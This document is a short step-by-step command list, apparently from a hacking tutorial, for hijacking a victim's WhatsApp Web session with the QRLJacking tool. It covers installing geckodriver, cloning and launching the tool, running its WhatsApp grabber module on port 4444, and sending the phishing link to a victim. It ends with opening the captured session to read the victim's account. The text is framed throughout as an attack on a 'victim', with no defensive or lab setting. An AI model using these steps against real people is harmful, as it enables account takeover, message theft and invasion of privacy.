WhatsApp Hacking Using QRLJacking (Command list) $ sudo apt update $ sudo apt full-upgrade -y $ sudo apt-get install python3.6 $ sudo apt install python3-pip First of all, you have to download the driver for firefox and setup in your Linux system using the commands given below: $ wget https://github.com/mozilla/geckodriver/releases/download/v0.30.0/geckodriver-v0.30.0-linux64.tar.gz $ tar -xvf geckodriver-v0.30.0-linux64.tar.gz $ chmod +x geckodriver $ sudo mv -f geckodriver /usr/local/share/geckodriver $ sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver $ sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver Now download and set up the QRLJacking tool given commands $ git clone https://github.com/OWASP/QRLJacking $ cd QRLJacking/QRLJacker $ pip install -r requirements.txt $ python3 QrlJacker.py Now we are ready to perform vector QR Jacking attack, type given commands: $ use grabber/whatsapp $ set port 4444 $ run Now send that link to victim and once victim scanned their WhatsApp web QR code, hacker/attacker get a session saved on this tool to later access a WhatsApp Web session. $ sessions Now the list of saved sessions is shown on your Terminal (In my case "0") $ sessions -i 0 Now wait a few seconds and Firefox automatically launched and you get a WhatsApp web session of victim as shown in the image given below.